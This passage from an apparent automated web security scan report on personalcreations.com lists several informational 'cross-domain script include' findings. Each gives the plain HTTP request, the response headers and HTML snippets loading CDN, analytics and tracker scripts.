<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...

19.15. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /apparel-gifts-her-PHERAPP

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:04 GMT
Connection: close
Content-Length: 280083

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.16. http://www.personalcreations.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:52 GMT
Connection: close
Content-Length: 152061


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.17. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /grandparents-day-gifts-PGDPDAY

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:41 GMT
Connection: close
Content-Length: 243187

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.18. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /halloween-home-decorations-PHALHOM

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:49 GMT
Connection: close
Content-Length: 201184

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...

19.19. http://www.personalcreations.com/just-because-gifts-PJBEBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /just-because-gifts-PJBEBSL

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:04 GMT
Connection: close
Content-Length: 413498

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...
<head id="productSelectionHead"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- BEGIN PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<!-- END PIR 103147 Suppress View Other Brands for MyPoints Ref 11/5 FS -->


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1"></script>
